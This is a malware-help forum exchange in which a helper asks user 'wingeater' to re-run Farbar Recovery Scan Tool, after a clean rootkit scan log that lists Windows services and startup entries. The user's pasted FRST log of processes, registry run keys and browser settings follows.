23:16:35.0471 0x0e30 [ 0EB0E5D22B1760F2DBCE632F2DD7A54D, B8A4CC62F88768947FB0A161CF9564DB28FD9C1C037B5475DF192982DE035C22 ] WebClient C:\windows\System32\webclnt.dll
23:16:35.0471 0x0e30 WebClient - ok
23:16:35.0502 0x0e30 [ C749025A679C5103E575E3B48E092C43, B71171D07EE7AB085A24BF3A1072FF2CE7EA021AAE695F6A90640E6EE8EB55C1 ] Wecsvc C:\windows\system32\wecsvc.dll
23:16:35.0518 0x0e30 Wecsvc - ok
23:16:35.0533 0x0e30 [ 7E591867422DC788B9E5BD337A669A08, 484E6BCCDF7ADCE9A1AACAD1BC7C7D7694B9E40FA90D94B14D80C607784F6C75 ] wercplsupport C:\windows\System32\wercplsupport.dll
23:16:35.0549 0x0e30 wercplsupport - ok
23:16:35.0564 0x0e30 [ 6D137963730144698CBD10F202E9F251, A9F522A125158D94F540544CCD4DBF47B9DCE2EA878C33675AFE40F80E8F4979 ] WerSvc C:\windows\System32\WerSvc.dll
23:16:35.0580 0x0e30 WerSvc - ok
23:16:35.0611 0x0e30 [ 611B23304BF067451A9FDEE01FBDD725, 0AF2734B978165FC6FD22B64862132CCE32528A21C698A49D176129446E099C8 ] WfpLwf C:\windows\system32\DRIVERS\wfplwf.sys
23:16:35.0611 0x0e30 WfpLwf - ok
23:16:35.0627 0x0e30 [ 05ECAEC3E4529A7153B3136CEB49F0EC, 9995CB2CEC70A633EA33CBB0DEAD2BB28CB67132B41E9444BDAB9E75744C9A50 ] WIMMount C:\windows\system32\drivers\wimmount.sys
23:16:35.0627 0x0e30 WIMMount - ok
23:16:35.0658 0x0e30 WinDefend - ok
23:16:35.0705 0x0e30 WinHttpAutoProxySvc - ok
23:16:35.0767 0x0e30 [ 19B07E7E8915D701225DA41CB3877306, D6555E8D276DBB11358246E0FE215F76F1FB358791C76B88D82C2A66A42DA19F ] Winmgmt C:\windows\system32\wbem\WMIsvc.dll
23:16:35.0783 0x0e30 Winmgmt - ok
23:16:35.0876 0x0e30 [ BCB1310604AA415C4508708975B3931E, 9D943F086D454345153A0DD426B4432532A44FD87950386B186E1CAD2AC70565 ] WinRM C:\windows\system32\WsmSvc.dll
23:16:35.0939 0x0e30 WinRM - ok
23:16:36.0001 0x0e30 [ FE88B288356E7B47B74B13372ADD906D, A16B166F6BB32EF9D2A142F27B9EC54CBC7B3AC915799783CF4C40E525BC9E03 ] WinUsb C:\windows\system32\DRIVERS\WinUsb.sys
23:16:36.0001 0x0e30 WinUsb - ok
23:16:36.0048 0x0e30 [ 4FADA86E62F18A1B2F42BA18AE24E6AA, CE1683386886BF34862681A46199EA7E7FB4232A186047DA7FBD8EC240AF6726 ] Wlansvc C:\windows\System32\wlansvc.dll
23:16:36.0079 0x0e30 Wlansvc - ok
23:16:36.0142 0x0e30 [ 06C8FA1CF39DE6A735B54D906BA791C6, D8FEC7DE227781CDA876904701B2AA995268F74DCD6CB34AA0296C557FC283B6 ] wlcrasvc C:\Program Files\Windows Live\Mesh\wlcrasvc.exe
23:16:36.0142 0x0e30 wlcrasvc - ok
23:16:36.0282 0x0e30 [ 2BACD71123F42CEA603F4E205E1AE337, 1FEF20554110371D738F462ECFFA999158EFEED02062414C58C1B61C422BF0B9 ] wlidsvc C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
23:16:36.0329 0x0e30 wlidsvc - ok
23:16:36.0376 0x0e30 [ F6FF8944478594D0E414D3F048F0D778, 6F75E0AE6127B33A92A88E59D4B048FD4C15F997807BE7BF0EFE76F95235B1D9 ] WmiAcpi C:\windows\system32\DRIVERS\wmiacpi.sys
23:16:36.0376 0x0e30 WmiAcpi - ok
23:16:36.0422 0x0e30 [ 38B84C94C5A8AF291ADFEA478AE54F93, 1AC267AC73670BEA5F3785C9AD9DB146F8E993A862C843742B21FDB90D102B2A ] wmiApSrv C:\windows\system32\wbem\WmiApSrv.exe
23:16:36.0422 0x0e30 wmiApSrv - ok
23:16:36.0454 0x0e30 WMPNetworkSvc - ok
23:16:36.0485 0x0e30 [ 96C6E7100D724C69FCF9E7BF590D1DCA, 2E63C9B0893B4FC03B7A71BAEA6202D3D3DB1B52F3643467829B5A573FD7655B ] WPCSvc C:\windows\System32\wpcsvc.dll
23:16:36.0485 0x0e30 WPCSvc - ok
23:16:36.0500 0x0e30 [ 93221146D4EBBF314C29B23CD6CC391D, C0750858A65BF51E210CD244C825C121D67E025CD2D2455139991AAC289A90FE ] WPDBusEnum C:\windows\system32\wpdbusenum.dll
23:16:36.0500 0x0e30 WPDBusEnum - ok
23:16:36.0532 0x0e30 [ 6BCC1D7D2FD2453957C5479A32364E52, E48554D31FBDCF8F985C1C72524CAA9106F5B7CC2B79064F8F5E2562D517F090 ] ws2ifsl C:\windows\system32\drivers\ws2ifsl.sys
23:16:36.0532 0x0e30 ws2ifsl - ok
23:16:36.0563 0x0e30 [ E8B1FE6669397D1772D8196DF0E57A9E, 39FE0819360719F756BD31A1884A0508A1E2371ACC723E25E005CBEC0A7B02FA ] wscsvc C:\windows\System32\wscsvc.dll
23:16:36.0563 0x0e30 wscsvc - ok
23:16:36.0610 0x0e30 [ 8D918B1DB190A4D9B1753A66FA8C96E8, DB7D2714DC04D2D6999A207D7399A5647C8653E5A1AD80856A65C5B6065AEDFE ] WSDPrintDevice C:\windows\system32\DRIVERS\WSDPrint.sys
23:16:36.0610 0x0e30 WSDPrintDevice - ok
23:16:36.0641 0x0e30 [ 4A2A5C50DD1A63577D3ACA94269FBC7F, F75C1906D431CF871AD954218DF32A0F206E45FF49332DEF9F13C0A36A407047 ] WSDScan C:\windows\system32\DRIVERS\WSDScan.sys
23:16:36.0641 0x0e30 WSDScan - ok
23:16:36.0641 0x0e30 WSearch - ok
23:16:36.0797 0x0e30 [ 61FF576450CCC80564B850BC3FB6713A, B2843BC9E2F62D27DCF6787D063378926748CE75002BADA1873DCB5039883705 ] wuauserv C:\windows\system32\wuaueng.dll
23:16:36.0859 0x0e30 wuauserv - ok
23:16:36.0890 0x0e30 [ AB886378EEB55C6C75B4F2D14B6C869F, D6C4602EB8F291DADEDF3CD211013D4AC752DDE7E799C2D8D74AA4F5477CAED6 ] WudfPf C:\windows\system32\drivers\WudfPf.sys
23:16:36.0890 0x0e30 WudfPf - ok
23:16:36.0937 0x0e30 [ DDA4CAF29D8C0A297F886BFE561E6659, 94E5DD649B5D86FA1A7C7D30FCF9644D0EE048D312E626111458ADF66BFBE978 ] WUDFRd C:\windows\system32\DRIVERS\WUDFRd.sys
23:16:36.0937 0x0e30 WUDFRd - ok
23:16:36.0968 0x0e30 [ B20F051B03A966392364C83F009F7D17, 88ECEB55AE91F58F592B96EBC10B572747D5A2F9B7629E8F371761E4F7408A65 ] wudfsvc C:\windows\System32\WUDFSvc.dll
23:16:36.0968 0x0e30 wudfsvc - ok
23:16:37.0000 0x0e30 [ 04F82965C09CBDF646B487E145060301, 2CD8533EDBE24C3E42EB7550E20F8A2EB9E5E345B165DEF543163A6BC1FDD18B ] WwanSvc C:\windows\System32\wwansvc.dll
23:16:37.0015 0x0e30 WwanSvc - ok
23:16:37.0031 0x0e30 ================ Scan global ===============================
23:16:37.0062 0x0e30 [ BA0CD8C393E8C9F83354106093832C7B, 18D8A4780A2BAA6CEF7FBBBDA0EF6BF2DADF146E1E578A618DD5859E8ADBF1A8 ] C:\windows\system32\basesrv.dll
23:16:37.0093 0x0e30 [ 88EDD0B34EED542745931E581AD21A32, DC2B93E1CEF5B0BCEE08D72669BB0F3AD0E8E6E75BDC08858407ED92F6FFA031 ] C:\windows\system32\winsrv.dll
23:16:37.0109 0x0e30 [ 88EDD0B34EED542745931E581AD21A32, DC2B93E1CEF5B0BCEE08D72669BB0F3AD0E8E6E75BDC08858407ED92F6FFA031 ] C:\windows\system32\winsrv.dll
23:16:37.0156 0x0e30 [ D6160F9D869BA3AF0B787F971DB56368, 0033E6212DD8683E4EE611B290931FDB227B4795F0B17C309DC686C696790529 ] C:\windows\system32\sxssrv.dll
23:16:37.0187 0x0e30 [ 24ACB7E5BE595468E3B9AA488B9B4FCB, 63541E3432FCE953F266AE553E7A394978D6EE3DB52388D885F668CF42C5E7E2 ] C:\windows\system32\services.exe
23:16:37.0202 0x0e30 [ Global ] - ok
23:16:37.0202 0x0e30 ================ Scan MBR ==================================
23:16:37.0218 0x0e30 [ 5B5E648D12FCADC244C1EC30318E1EB9 ] \Device\Harddisk0\DR0
23:16:37.0577 0x0e30 \Device\Harddisk0\DR0 - ok
23:16:37.0577 0x0e30 ================ Scan VBR ==================================
23:16:37.0592 0x0e30 [ 233DAD61F305AE3EDD6B953204857F5F ] \Device\Harddisk0\DR0\Partition1
23:16:37.0592 0x0e30 \Device\Harddisk0\DR0\Partition1 - ok
23:16:37.0592 0x0e30 ================ Scan generic autorun ======================
23:16:37.0592 0x0e30 TPwrMain - ok
23:16:37.0592 0x0e30 HSON - ok
23:16:37.0592 0x0e30 TCrdMain - ok
23:16:38.0154 0x0e30 [ 8667556E9A094E935212693AD05098E3, 86732B42130EA18D3CA2B38A7120A2EFE7D52689ABD50AE59A6968316450111F ] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
23:16:38.0653 0x0e30 RtHDVCpl - ok
23:16:38.0825 0x0e30 [ 0BE126224273ACB0925C07B30A0E4209, CFFFCA6E70B1818438157209A99B573D06F8FC9F773F8EF3DE4A997A1992F25A ] C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
23:16:38.0887 0x0e30 RtHDVBg_Dolby - ok
23:16:38.0887 0x0e30 SynTPEnh - ok
23:16:38.0903 0x0e30 Teco - ok
23:16:38.0934 0x0e30 [ 426350B428CD70D037A3326EB9E5EDFD, B7B1A20D1D75661533CF983EA0C6E520B928AF6FCCDA70C488FC8FC566B5AF7F ] C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe
23:16:38.0950 0x0e30 TosSENotify - ok
23:16:38.0950 0x0e30 TosWaitSrv - ok
23:16:38.0981 0x0e30 [ F82483A80D49ACCA81193A294FB233CD, 7EEA9E7F62A92AD98569B1A4F4809D91D7ED671821A738EB75BC6E469DB44494 ] C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe
23:16:38.0981 0x0e30 TosVolRegulator - ok
23:16:38.0981 0x0e30 TosReelTimeMonitor - ok
23:16:39.0059 0x0e30 [ 0F6045B391A7952F26DB143F27418E6F, F5CD649FFB7962F7CC2F4E7C412085FAF527C9565D7CA41784458CF38C66F179 ] C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
23:16:39.0074 0x0e30 StartCCC - ok
23:16:39.0121 0x0e30 [ 2D7816ACDA1CC85C873CBC19A4121D58, 3F3E41EBEF81DB8C2A84A8E75D1E4852046A10A5DCB8CCCC2ADF7FD0DC8EEF66 ] C:\Program Files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe
23:16:39.0137 0x0e30 ToshibaAppPlace - ok
23:16:39.0168 0x0e30 [ 34D296AFC913E302953C70463EF09A48, BC413307CBC56C039EE8A05B51A56E14EF59678FBB33815AEB320078056C8CE7 ] C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
23:16:39.0184 0x0e30 HP Software Update - ok
23:16:39.0402 0x0e30 [ 26B558B2D31C7425B455B00E562EAD93, B64D128A2F1FC42BA4376F8EB08D70F4B705745CB983D0631DB45851BF34BBDF ] C:\Program Files\AVAST Software\Avast\AvastUI.exe
23:16:39.0527 0x0e30 AvastUI.exe - ok
23:16:39.0652 0x0e30 [ 1DE859B82E381A645C44284A5044BC33, 305AE678D3163D57C8E027F94BC553FDFDE7F9A14599EAEC370B0867DE4A9EC2 ] C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
23:16:39.0652 0x0e30 SunJavaUpdateSched - ok
23:16:39.0792 0x0e30 [ 47EA5F76FAB723C61AB4A0D79BAD512C, A7A38EB0A7068B160E6949945EF639F999A06AE35746F6E79C7350745798E5C9 ] C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
23:16:39.0808 0x0e30 Adobe ARM - ok
23:16:39.0979 0x0e30 [ 7EE68A122ED08E4AAD8DA551E34D2515, B3C9AB270AF595D3DBAFBF4A312B96CBF00C16F0A03CCC86BE56825CD1EB7143 ] C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
23:16:40.0120 0x0e30 SDTray - ok
23:16:40.0213 0x0e30 [ DCCA4B04AF87E52EF9EAA2190E06CBAC, 8858CFD159BB32AE9FCCA1A79EA83C876D481A286E914071D48F42FCA5B343D8 ] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe
23:16:40.0244 0x0e30 Sidebar - ok
23:16:40.0276 0x0e30 [ 0FA760BF380B08D0B67B5507CD8B32AA, 0F73A7F64C4FDAB98CD3A865CC54B3A7195761530FCB115B725CC5A9FB738739 ] C:\Windows\System32\mctadmin.exe
23:16:40.0276 0x0e30 mctadmin - ok
23:16:40.0322 0x0e30 [ DCCA4B04AF87E52EF9EAA2190E06CBAC, 8858CFD159BB32AE9FCCA1A79EA83C876D481A286E914071D48F42FCA5B343D8 ] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe
23:16:40.0354 0x0e30 Sidebar - ok
23:16:40.0354 0x0e30 [ 0FA760BF380B08D0B67B5507CD8B32AA, 0F73A7F64C4FDAB98CD3A865CC54B3A7195761530FCB115B725CC5A9FB738739 ] C:\Windows\System32\mctadmin.exe
23:16:40.0354 0x0e30 mctadmin - ok
23:16:40.0650 0x0e30 [ 6D0BCB1BA8F55A6C1107C2D9DA03DAD7, 175019D3359446DDD2416EA5462AEB82434DBC9C96E3AC4726F5E68D0728F10F ] C:\Program Files\CCleaner\CCleaner64.exe
23:16:40.0884 0x0e30 CCleaner Monitoring - ok
23:16:41.0087 0x0e30 [ B1949628130F192DA27FDBAEA516BB6E, 13E5A2EBF0FDAB29CEA1E7FAEB3141233198D9A28353BDBB6FDB03602BE32AC6 ] C:\Program Files (x86)\Spybot - Search & Destroy 2\SDCleaner.exe
23:16:41.0243 0x0e30 Spybot-S&D Cleaning - ok
23:16:41.0258 0x0e30 Waiting for KSN requests completion. In queue: 384
23:16:42.0272 0x0e30 Waiting for KSN requests completion. In queue: 384
23:16:43.0286 0x0e30 Waiting for KSN requests completion. In queue: 72
23:16:44.0597 0x0e30 AV detected via SS2: avast! Antivirus, C:\Program Files\AVAST Software\Avast\VisthAux.exe ( 9.0.2021.515 ), 0x41000 ( enabled : updated )
23:16:44.0597 0x0e30 FW detected via SS2: avast! Antivirus, C:\Program Files\AVAST Software\Avast\VisthAux.exe ( 9.0.2021.515 ), 0x40010 ( disabled )
23:16:44.0644 0x0e30 Win FW state via NFP2: enabled
23:16:47.0576 0x0e30 ============================================================
23:16:47.0576 0x0e30 Scan finished
23:16:47.0576 0x0e30 ============================================================
23:16:47.0576 0x05b4 Detected object count: 0
23:16:47.0576 0x05b4 Actual detected object count: 0

Hi wingeater,

http://i1269.photobucket.com/albums/jj590/OCD-WTT/bullseye_zpse9eaf36e.gif (http://s1269.photobucket.com/user/OCD-WTT/media/bullseye_zpse9eaf36e.gif.html) Re-run Farbar Recovery Scan Tool it should be on your desktop.


Windows XP : Double click on the icon to run it.
Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"

When the tool opens click Yes to disclaimer.
Press Scan button.
It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.

=========================

In your next post please provide the following:

new FRST.txt

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 10-11-2014
Ran by My Computer (administrator) on MYCOMPUTER-PC on 11-11-2014 07:52:41
Running from C:\Users\My Computer\Desktop
Loaded Profile: My Computer (Available profiles: My Computer)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Windows\System32\GFNEXSrv.exe
(Nitro PDF Software) C:\Program Files\Common Files\Nitro\Reader\3.0\NitroPDFReaderDriverService3x64.exe
(Symantec Corporation) C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TBS\HSON.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\FlashCards\TCrdMain.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TECO\Teco.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\ReelTime\TosReelTimeMonitor.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\Power Saver\TosCoSrv.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(TOSHIBA Corporation) C:\Program Files\Toshiba\TECO\TecoService.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TPHM\TPCHSrv.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TOSHIBA HDD SSD Alert\TosSENotify.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TPHM\TPCHWMsg.exe
(Microsoft Corporation.) C:\Program Files (x86)\Microsoft\BingBar\7.3.124.0\SeaPort.EXE
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Advanced Micro Devices, Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MMLoadDrv.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [590256 2011-05-17] (TOSHIBA Corporation)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [296824 2010-09-25] (TOSHIBA Corporation)
HKLM\...\Run: [TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [972672 2011-04-27] (TOSHIBA Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12558440 2011-07-07] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2226280 2011-06-03] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2679592 2011-02-03] (Synaptics Incorporated)
HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1544624 2011-05-24] (TOSHIBA Corporation)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [710560 2011-06-10] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [712096 2011-07-01] (TOSHIBA Corporation)
HKLM\...\Run: [TosVolRegulator] => C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe [24376 2009-11-11] (TOSHIBA Corporation)
HKLM\...\Run: [TosReelTimeMonitor] => C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe [38824 2011-06-28] (TOSHIBA Corporation)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [343168 2011-10-13] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [ToshibaAppPlace] => C:\Program Files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe [552960 2010-09-23] (Toshiba)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [4085896 2014-07-31] (AVAST Software)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [256896 2014-07-11] (Oracle Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-09-12] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-4159919823-1585328292-427241361-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [6462744 2014-08-21] (Piriform Ltd)
HKU\S-1-5-21-4159919823-1585328292-427241361-1000\...\Run: [Spybot-S&D Cleaning] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-4159919823-1585328292-427241361-1000\...\MountPoints2: {4edd8e39-d1f2-11e3-830a-386077ebbde8} - E:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-4159919823-1585328292-427241361-1000\...\MountPoints2: {d329bad1-4974-11e3-99b5-386077ebbde8} - E:\LaunchU3.exe
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll (AVAST Software)
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://google.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.msn.com/?pc=AV01
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://start.toshiba.com/
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://start.toshiba.com/
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=AV01
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Bar = http://www.msn.com/?pc=AV01
SearchScopes: HKLM - DefaultScope {D01B96D2-26CC-48AD-9835-0116499E0CB9} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM - {D01B96D2-26CC-48AD-9835-0116499E0CB9} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKLM-x32 - DefaultScope {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKLM-x32 - {D01B96D2-26CC-48AD-9835-0116499E0CB9} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKCU - DefaultScope {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKCU - {53439EBD-1E47-44D0-AC6E-AFBB1C5FFB6C} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=
SearchScopes: HKCU - {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKCU - {D01B96D2-26CC-48AD-9835-0116499E0CB9} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.124.0\amd64\BingExt.dll (Microsoft Corporation.)
BHO: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\x64\TOSHIBAMediaControllerIE.dll (TOSHIBA Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.124.0\BingExt.dll (Microsoft Corporation.)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll (TOSHIBA Corporation)
